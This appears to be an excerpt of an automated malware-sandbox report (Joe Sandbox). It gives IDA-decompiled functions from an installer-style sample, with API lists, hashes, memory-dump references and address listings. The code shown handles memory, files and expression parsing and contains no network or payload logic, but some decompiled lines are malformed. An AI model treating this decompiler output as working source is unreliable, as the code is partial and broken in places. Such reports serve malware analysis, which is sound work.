                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction ID: d1e0a2a93c5684a536d9419adbf701d81bd0aa6c2e01a71bf08629b566d4acbd
                                                            • Opcode Fuzzy Hash: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction Fuzzy Hash: 4A016270640209FBEF209F60DE09EAE3769EB04344F008039FA06B51D0DBB89955CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C21F58 Relevance: 9.1, APIs: 6, Instructions: 134memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E73C21F58(void* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				void* _t52;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t60;

				_t52 = _a4;
				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
				while(1) {
					_v8 = _t46;
					_t59 = _t46 << 5;
					_t60 =  *(_t59 + _t52 + 0x830);
					if(_t60 == 0 || _t60 == 0x1a) {
						goto L8;
					}
					if(_t60 != 0xffffffff) {
						_t51 = _t60 - 1;
						if(_t60 - 1 > 0x18) {
							 *(_t59 + _t52 + 0x830) = 0x1a;
							L11:
							_t56 = _t59 + _t52;
							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
							}
							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
							_v4 = _t48;
							if(_t48 > 7) {
								L28:
								_t49 = GlobalFree(_t60);
								_t57 = _v8;
								if(_t57 == 0) {
									return _t49;
								}
								_t43 = _t57 + 1; // 0x2
								_t55 =  !=  ? _t43 : 0;
								_t46 =  !=  ? _t43 : 0;
								continue;
							} else {
								switch( *((intOrPtr*)(_t48 * 4 +  &M73C22108))) {
									case 0:
										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
										goto L28;
									case 1:
										_push(__esi);
										__eax = E73C21326();
										_pop(__ecx);
										goto L18;
									case 2:
										_push(__esi);
										__eax = E73C21326();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L28;
									case 3:
										__eax = E73C212AF(__esi);
										goto L21;
									case 4:
										 *0x73c25040 =  *0x73c25040 +  *0x73c25040;
										__eax = GlobalAlloc(0x40,  *0x73c25040 +  *0x73c25040);
										__ecx =  *0x73c25040;
										_a4 = __eax;
										__eax = MultiByteToWideChar(0, 0, __esi,  *0x73c25040, __eax,  *0x73c25040);
										if(_v4 != 5) {
											__eax = _a4;
											L21:
											 *(__edi + __ebx + 0x834) = __eax;
											L18:
											 *__ebp = __eax;
											goto L28;
										}
										__eax = GlobalAlloc(0x40, 0x10);
										 *(__edi + __ebx + 0x834) = __eax;
										__edi = _a4;
										_push(__eax);
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
										goto L28;
									case 5:
										if( *__esi != 0) {
											_push(__esi);
											__eax = E73C21326();
											 *(__edi + __ebx + 0x820) = __eax;
										}
										goto L28;
									case 6:
										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c25040;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c25040 +  *0x73c25038;
										_push(__ecx);
										__eax = __ecx + 0xc;
										 *(__edx + 0x820) = __eax;
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E73C2144D(__ecx);
										__esp = __esp + 0xc;
										goto L28;
								}
							}
						}
						_t47 = E73C214E2(_t51);
						L9:
						L10:
						_t60 = _t47;
						goto L11;
					}
					_t47 = E73C2152B();
					goto L10;
					L8:
					_t47 = E73C212AF(0x73c240c7);
					goto L9;
				}
			}














                                                            0x73c21f5b
                                                            0x73c21f6a
                                                            0x73c21f6d
                                                            0x73c21f6f
                                                            0x73c21f73
                                                            0x73c21f76
                                                            0x73c21f7f
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21f89
                                                            0x73c21f92
                                                            0x73c21f98
                                                            0x73c21fa2
                                                            0x73c21fbc
                                                            0x73c21fc4
                                                            0x73c21fc7
                                                            0x73c21fc7
                                                            0x73c21fd7
                                                            0x73c21fdf
                                                            0x73c21fe7
                                                            0x73c21fee
                                                            0x73c220dc
                                                            0x73c220dd
                                                            0x73c220e3
                                                            0x73c220e9
                                                            0x73c22106
                                                            0x73c22106
                                                            0x73c220ed
                                                            0x73c220f6
                                                            0x73c220f9
                                                            0x00000000
                                                            0x73c21ff4
                                                            0x73c21ff4
                                                            0x00000000
                                                            0x73c21ffb
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22007
                                                            0x73c22008
                                                            0x73c2200d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22016
                                                            0x73c22017
                                                            0x73c2201c
                                                            0x73c2201d
                                                            0x73c22020
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22029
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2203d
                                                            0x73c22042
                                                            0x73c22048
                                                            0x73c22056
                                                            0x73c2205a
                                                            0x73c22065
                                                            0x73c22090
                                                            0x73c2202f
                                                            0x73c2202f
                                                            0x73c2200e
                                                            0x73c2200e
                                                            0x00000000
                                                            0x73c2200e
                                                            0x73c2206b
                                                            0x73c22071
                                                            0x73c22078
                                                            0x73c2207c
                                                            0x73c2207d
                                                            0x73c2207e
                                                            0x73c22081
                                                            0x73c22088
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22099
                                                            0x73c2209b
                                                            0x73c2209c
                                                            0x73c220a9
                                                            0x73c220a9
                                                            0x00000000
                                                            0x00000000
                                                            0x73c220b9
                                                            0x73c220ba
                                                            0x73c220c1
                                                            0x73c220c7
                                                            0x73c220c8
                                                            0x73c220cb
                                                            0x73c220d1
                                                            0x73c220d2
                                                            0x73c220d3
                                                            0x73c220d4
                                                            0x73c220d9
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21ff4
                                                            0x73c21fee
                                                            0x73c21f9b
                                                            0x73c21fb9
                                                            0x73c21fba
                                                            0x73c21fba
                                                            0x00000000
                                                            0x73c21fba
                                                            0x73c21f8b
                                                            0x00000000
                                                            0x73c21faf
                                                            0x73c21fb4
                                                            0x00000000
                                                            0x73c21fb4

                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C220DD
                                                              • Part of subcall function 73C212AF: lstrcpynA.KERNEL32(00000000,?,73C21502,?,73C211C4,-000000A0), ref: 73C212BF
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C22042
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73C2205A
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73C2206B
                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 73C22081
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C22088
                                                              • Part of subcall function 73C21958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73C220A7,00000000,?), ref: 73C2198A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 506890080-0
                                                            • Opcode ID: 1dd5703124937e311f3302622533df8b4b65cf41a430222b5aba0b336caf9b7c
                                                            • Instruction ID: 2f986475d0e71452ac79743aa4a814925d7ffcd8e8b4b9f8824ca2ea71ecf17a
                                                            • Opcode Fuzzy Hash: 1dd5703124937e311f3302622533df8b4b65cf41a430222b5aba0b336caf9b7c
                                                            • Instruction Fuzzy Hash: A941C172505205EFD305EF25DC44BAABBE8FF44312F55823AE859CE18ADB306940CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004027E8 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E004027E8(int __ebx) {
				CHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402C39(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x78) = _t26;
				if(E00405C56(_t26) == 0) {
					E00402C39(0xffffffed);
				}
				E00405DC5(_t55);
				_t29 = E00405DEA(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0xc) =  *(_t61 - 0x24);
					if( *(_t61 - 0x20) != _t49) {
						_t37 =  *0x452434;
						 *(_t61 - 0x30) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E0040336B(_t49);
							E00403355(_t54,  *(_t61 - 0x30));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x20));
							 *(_t61 - 0x38) = _t59;
							if(_t59 != _t49) {
								E00403143( *(_t61 - 0x24), _t49, _t59,  *(_t61 - 0x20));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x8c) =  *_t59;
									E00405DA5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x8c);
								}
								GlobalFree( *(_t61 - 0x38));
							}
							E00405E91( *(_t61 + 8), _t54,  *(_t61 - 0x30));
							GlobalFree(_t54);
							 *(_t61 - 0xc) =  *(_t61 - 0xc) | 0xffffffff;
						}
					}
					_t52 = E00403143( *(_t61 - 0xc),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileA( *(_t61 - 0x78));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                            0x004027e8
                                                            0x004027ea
                                                            0x004027ef
                                                            0x004027f4
                                                            0x004027f7
                                                            0x00402801
                                                            0x00402805
                                                            0x00402805
                                                            0x0040280b
                                                            0x00402818
                                                            0x00402820
                                                            0x00402823
                                                            0x0040282f
                                                            0x00402832
                                                            0x00402838
                                                            0x00402846
                                                            0x0040284b
                                                            0x0040284f
                                                            0x00402852
                                                            0x0040285b
                                                            0x00402867
                                                            0x0040286b
                                                            0x0040286e
                                                            0x00402878
                                                            0x0040289d
                                                            0x00402884
                                                            0x0040288c
                                                            0x00402892
                                                            0x00402897
                                                            0x00402897
                                                            0x004028a4
                                                            0x004028a4
                                                            0x004028b1
                                                            0x004028b7
                                                            0x004028bd
                                                            0x004028bd
                                                            0x0040284f
                                                            0x004028d1
                                                            0x004028d3
                                                            0x004028d3
                                                            0x004028dd
                                                            0x004028de
                                                            0x004028e2
                                                            0x004028e6
                                                            0x004028ec
                                                            0x004028ec
                                                            0x004028f3
                                                            0x004022e5
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402849
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402865
                                                            • GlobalFree.KERNEL32(?), ref: 004028A4
                                                            • GlobalFree.KERNEL32(00000000), ref: 004028B7
                                                            • CloseHandle.KERNEL32(?), ref: 004028D3
                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028E6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction ID: 62dc5015629f04e2a446b0396b5ca5864e91704113ef4cf620f7a35519d741bb
                                                            • Opcode Fuzzy Hash: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction Fuzzy Hash: 4B31AD32800128BBDF207FA5DE88D9E7B79BF08324F14423AF454B62D1CB7989419B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C21C2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E73C21C2B(signed int __edx, char _a8, void* _a16) {
				char _v8;
				char _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				void* _t28;
				char _t31;
				char _t32;
				signed int _t33;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				signed int _t63;
				char _t67;
				signed int _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				signed int _t83;
				signed int _t86;
				void* _t91;

				_t70 = __edx;
				asm("xorps xmm0, xmm0");
				 *0x73c25040 = _a8;
				 *0x73c2503c = _a16;
				asm("movlpd [esp+0x10], xmm0");
				_t28 = E73C2152B();
				_push(_t28);
				_v32 = _t28;
				_t72 = E73C21326();
				_t63 = _t70;
				_t79 = E73C2152B();
				_a16 = _t79;
				_t67 =  *_t79;
				_t31 = _t67;
				_a8 = _t31;
				if(_t67 == 0x7e) {
					L3:
					_t68 = _v36;
					_t83 = _v40;
					L4:
					_t32 = _t31;
					_t91 = _t32 - 0x2f;
					if(_t91 > 0) {
						_t33 = _t32 - 0x3c;
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
							if( *((char*)(_t79 + 1)) != 0x3c) {
								__eflags = _t63 - _t68;
								if(__eflags > 0) {
									L18:
									asm("xorps xmm0, xmm0");
									asm("movlpd [esp+0x10], xmm0");
									_t72 = _v40;
									_t63 = _v36;
									L19:
									_push( &_v28);
									_push(_t63);
									_push(_t72);
									E73C2144D(_t68);
									E73C2157E( &_v28);
									GlobalFree(_v32);
									return GlobalFree(_t79);
								}
								if(__eflags < 0) {
									L57:
									_t72 = 1;
									_t63 = 0;
									goto L19;
								}
								__eflags = _t72 - _t83;
								if(_t72 >= _t83) {
									goto L18;
								}
								goto L57;
							}
							_t70 = _t63;
							_t68 = _t83;
							_t41 = E73C23090(_t72, _t83, _t70);
							L53:
							_t72 = _t41;
							_t63 = _t70;
							goto L19;
						}
						_t42 = _t33 - 1;
						__eflags = _t42;
						if(_t42 == 0) {
							__eflags = _t72 - _t83;
							if(_t72 != _t83) {
								goto L18;
							}
							__eflags = _t63 - _t68;
							L22:
							if(__eflags != 0) {
								goto L18;
							}
							goto L57;
						}
						_t43 = _t42 - 1;
						__eflags = _t43;
						if(_t43 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
							if( *((char*)(_t79 + 1)) != 0x3e) {
								__eflags = _t63 - _t68;
								if(__eflags < 0) {
									goto L18;
								}
								if(__eflags > 0) {
									goto L57;
								}
								__eflags = _t72 - _t83;
								if(_t72 <= _t83) {
									goto L18;
								}
								goto L57;
							}
							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
							_t44 = _t72;
							_t70 = _t63;
							_t68 = _t83;
							if( *((char*)(_t79 + 2)) != 0x3e) {
								_t41 = E73C230B0(_t44, _t68, _t70);
							} else {
								_t41 = E73C230E0(_t44, _t68, _t70);
							}
							goto L53;
						}
						_t45 = _t43 - 0x20;
						__eflags = _t45;
						if(_t45 == 0) {
							_t72 = _t72 ^ _t83;
							_t63 = _t63 ^ _t68;
							goto L19;
						}
						_t46 = _t45 - 0x1e;
						__eflags = _t46;
						if(_t46 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
							if( *((char*)(_t79 + 1)) != 0x7c) {
								_t72 = _t72 | _t83;
								_t63 = _t63 | _t68;
								goto L19;
							}
							__eflags = _t72 | _t63;
							if((_t72 | _t63) != 0) {
								goto L57;
							}
							L17:
							__eflags = _t83 | _t68;
							if((_t83 | _t68) != 0) {
								goto L57;
							}
							goto L18;
						}
						__eflags = _t46 == 0;
						if(_t46 == 0) {
							_t72 =  !_t72;
							_t63 =  !_t63;
						}
						goto L19;
					}
					if(_t91 == 0) {
						L24:
						__eflags = _t83 | _t68;
						if((_t83 | _t68) != 0) {
							_push(_t68);
							_push(_t83);
							_push(_t63);
							_push(_t72);
							_t51 = E73C22FB0();
							_t86 = _t63;
							_t72 = _t51;
							_t63 = _t70;
						} else {
							asm("xorps xmm0, xmm0");
							_t68 = _t72;
							asm("movlpd [esp+0x10], xmm0");
							_t86 = _t63;
							_t63 = _v36;
							_t72 = _v40;
						}
						__eflags = _v8 - 0x2f;
						if(_v8 != 0x2f) {
							_t72 = _t68;
							_t63 = _t86;
						}
						goto L19;
					}
					_t52 = _t32 - 0x21;
					if(_t52 == 0) {
						__eflags = _t72 | _t63;
						goto L22;
					}
					_t53 = _t52 - 4;
					if(_t53 == 0) {
						goto L24;
					}
					_t54 = _t53 - 1;
					if(_t54 == 0) {
						__eflags =  *((char*)(_t79 + 1)) - 0x26;
						if( *((char*)(_t79 + 1)) != 0x26) {
							_t72 = _t72 & _t83;
							_t63 = _t63 & _t68;
							goto L19;
						}
						__eflags = _t72 | _t63;
						if((_t72 | _t63) == 0) {
							goto L18;
						}
						goto L17;
					}
					_t55 = _t54 - 4;
					if(_t55 == 0) {
						_t41 = E73C22ED0(_t72, _t63, _t83, _t68);
						goto L53;
					} else {
						_t56 = _t55 - 1;
						if(_t56 == 0) {
							_t72 = _t72 + _t83;
							asm("adc ebx, ecx");
						} else {
							if(_t56 == 0) {
								_t72 = _t72 - _t83;
								asm("sbb ebx, ecx");
							}
						}
						goto L19;
					}
				}
				_a8 = _t67;
				if(_t67 == 0x21) {
					goto L3;
				} else {
					_t81 = E73C2152B();
					_push(_t81);
					_t83 = E73C21326();
					_v40 = _t70;
					GlobalFree(_t81);
					_t79 = _a16;
					_t68 = _v40;
					_t31 =  *_t79;
					_a8 = _t31;
					goto L4;
				}
			}

































                                                            0x73c21c2b
                                                            0x73c21c32
                                                            0x73c21c38
                                                            0x73c21c42
                                                            0x73c21c47
                                                            0x73c21c4d
                                                            0x73c21c52
                                                            0x73c21c53
                                                            0x73c21c5d
                                                            0x73c21c5f
                                                            0x73c21c66
                                                            0x73c21c68
                                                            0x73c21c6c
                                                            0x73c21c6e
                                                            0x73c21c70
                                                            0x73c21c77
                                                            0x73c21cad
                                                            0x73c21cad
                                                            0x73c21cb1
                                                            0x73c21cb5
                                                            0x73c21cb5
                                                            0x73c21cb8
                                                            0x73c21cbb
                                                            0x73c21da3
                                                            0x73c21da3
                                                            0x73c21da6
                                                            0x73c21e3b
                                                            0x73c21e3f
                                                            0x73c21e55
                                                            0x73c21e57
                                                            0x73c21d1a
                                                            0x73c21d1a
                                                            0x73c21d1d
                                                            0x73c21d23
                                                            0x73c21d27
                                                            0x73c21d2b
                                                            0x73c21d2f
                                                            0x73c21d30
                                                            0x73c21d31
                                                            0x73c21d32
                                                            0x73c21d3c
                                                            0x73c21d4e
                                                            0x73c21d5a
                                                            0x73c21d5a
                                                            0x73c21e5d
                                                            0x73c21e67
                                                            0x73c21e69
                                                            0x73c21e6a
                                                            0x00000000
                                                            0x73c21e6a
                                                            0x73c21e5f
                                                            0x73c21e61
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21e61
                                                            0x73c21e43
                                                            0x73c21e45
                                                            0x73c21e47
                                                            0x73c21e4c
                                                            0x73c21e4c
                                                            0x73c21e4e
                                                            0x00000000
                                                            0x73c21e4e
                                                            0x73c21dac
                                                            0x73c21dac
                                                            0x73c21daf
                                                            0x73c21e2c
                                                            0x73c21e2e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21e34
                                                            0x73c21d63
                                                            0x73c21d63
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21d65
                                                            0x73c21db1
                                                            0x73c21db1
                                                            0x73c21db4
                                                            0x73c21df8
                                                            0x73c21dfc
                                                            0x73c21e18
                                                            0x73c21e1a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21e20
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21e22
                                                            0x73c21e24
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21e2a
                                                            0x73c21dfe
                                                            0x73c21e02
                                                            0x73c21e04
                                                            0x73c21e06
                                                            0x73c21e08
                                                            0x73c21e11
                                                            0x73c21e0a
                                                            0x73c21e0a
                                                            0x73c21e0a
                                                            0x00000000
                                                            0x73c21e08
                                                            0x73c21db6
                                                            0x73c21db6
                                                            0x73c21db9
                                                            0x73c21def
                                                            0x73c21df1
                                                            0x00000000
                                                            0x73c21df1
                                                            0x73c21dbb
                                                            0x73c21dbb
                                                            0x73c21dbe
                                                            0x73c21dd3
                                                            0x73c21dd7
                                                            0x73c21de6
                                                            0x73c21de8
                                                            0x00000000
                                                            0x73c21de8
                                                            0x73c21dd9
                                                            0x73c21ddb
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21d12
                                                            0x73c21d12
                                                            0x73c21d14
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21d14
                                                            0x73c21dc1
                                                            0x73c21dc4
                                                            0x73c21dca
                                                            0x73c21dcc
                                                            0x73c21dcc
                                                            0x00000000
                                                            0x73c21dc4
                                                            0x73c21cc1
                                                            0x73c21d6a
                                                            0x73c21d6c
                                                            0x73c21d6e
                                                            0x73c21d87
                                                            0x73c21d88
                                                            0x73c21d89
                                                            0x73c21d8a
                                                            0x73c21d8b
                                                            0x73c21d90
                                                            0x73c21d92
                                                            0x73c21d94
                                                            0x73c21d70
                                                            0x73c21d70
                                                            0x73c21d73
                                                            0x73c21d75
                                                            0x73c21d7b
                                                            0x73c21d7d
                                                            0x73c21d81
                                                            0x73c21d81
                                                            0x73c21d96
                                                            0x73c21d9b
                                                            0x73c21d9d
                                                            0x73c21d9f
                                                            0x73c21d9f
                                                            0x00000000
                                                            0x73c21d9b
                                                            0x73c21cc7
                                                            0x73c21cca
                                                            0x73c21d61
                                                            0x00000000
                                                            0x73c21d61
                                                            0x73c21cd0
                                                            0x73c21cd3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21cd9
                                                            0x73c21cdc
                                                            0x73c21d08
                                                            0x73c21d0c
                                                            0x73c21d5b
                                                            0x73c21d5d
                                                            0x00000000
                                                            0x73c21d5d
                                                            0x73c21d0e
                                                            0x73c21d10
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c21d10
                                                            0x73c21cde
                                                            0x73c21ce1
                                                            0x73c21cfe
                                                            0x00000000
                                                            0x73c21ce3
                                                            0x73c21ce3
                                                            0x73c21ce6
                                                            0x73c21cf4
                                                            0x73c21cf6
                                                            0x73c21ce8
                                                            0x73c21cec
                                                            0x73c21cee
                                                            0x73c21cf0
                                                            0x73c21cf0
                                                            0x73c21cec
                                                            0x00000000
                                                            0x73c21ce6
                                                            0x73c21ce1
                                                            0x73c21c79
                                                            0x73c21c80
                                                            0x00000000
                                                            0x73c21c82
                                                            0x73c21c87
                                                            0x73c21c89
                                                            0x73c21c91
                                                            0x73c21c93
                                                            0x73c21c97
                                                            0x73c21c9d
                                                            0x73c21ca1
                                                            0x73c21ca5
                                                            0x73c21ca7
                                                            0x00000000
                                                            0x73c21ca7

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeGlobal$__alldvrm
                                                            • String ID: /
                                                            • API String ID: 482422042-2043925204
                                                            • Opcode ID: be58f7f9cabf05b53cb63f4d7f475f4ef37ea3662cc6463031ab90c15dcd0110
                                                            • Instruction ID: 50830b5e42e9dac52ca9602fb1ef901a4b62b42c54e2956ec6d81e487bfaadf6
                                                            • Opcode Fuzzy Hash: be58f7f9cabf05b53cb63f4d7f475f4ef37ea3662cc6463031ab90c15dcd0110
                                                            • Instruction Fuzzy Hash: 6B510B76A08385DBD323AE7A8CC472A7EFEABCA113F1A052DE146C7245D7A1DC454362
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C210C6 Relevance: 8.9, APIs: 7, Instructions: 155memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E73C210C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				void _t29;
				void* _t30;
				void* _t36;
				void* _t43;
				intOrPtr _t52;
				void* _t56;
				void* _t62;
				void* _t63;
				void _t66;
				void* _t67;
				void* _t74;
				signed int _t75;
				void* _t79;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				void _t88;
				void _t89;
				void* _t90;
				void* _t92;
				void* _t94;

				 *0x73c25040 = _a8;
				 *0x73c2503c = _a16;
				 *0x73c25038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73c25014, E73C212F7, _t79, _t82);
				_t83 =  *0x73c25040 * 0x14;
				_v0 = _t83;
				_t90 = E73C2152B();
				_a8 = _t90;
				_t80 = _t90;
				_t66 = _v0;
				if(_t66 == 0) {
					L28:
					return GlobalFree(_t90);
				}
				do {
					_t29 = _t66;
					_t80 = _t80 + 1;
					_t94 = _t29 - 0x66;
					if(_t94 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L24:
							_t31 =  *0x73c25010;
							if( *0x73c25010 != 0) {
								E73C212FA( *0x73c25038, _t31 + 4, _t83);
								_t67 =  *0x73c25010;
								_t92 = _t92 + 0xc;
								 *0x73c25010 =  *_t67;
								GlobalFree(_t67);
							}
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L15:
							GlobalFree(E73C2157E(E73C214E2( *_t80 - 0x30)));
							_t80 = _t80 + 1;
							goto L26;
						}
						_t43 = _t36;
						if(_t43 == 0) {
							L13:
							GlobalFree(E73C215C7( *_t80 - 0x30, E73C2152B()));
							_t80 = _t80 + 1;
							L11:
							_t83 = _v0;
							goto L26;
						}
						L8:
						if(_t43 != 1) {
							goto L26;
						}
						_t88 = GlobalAlloc(0x40, _t83 + 4);
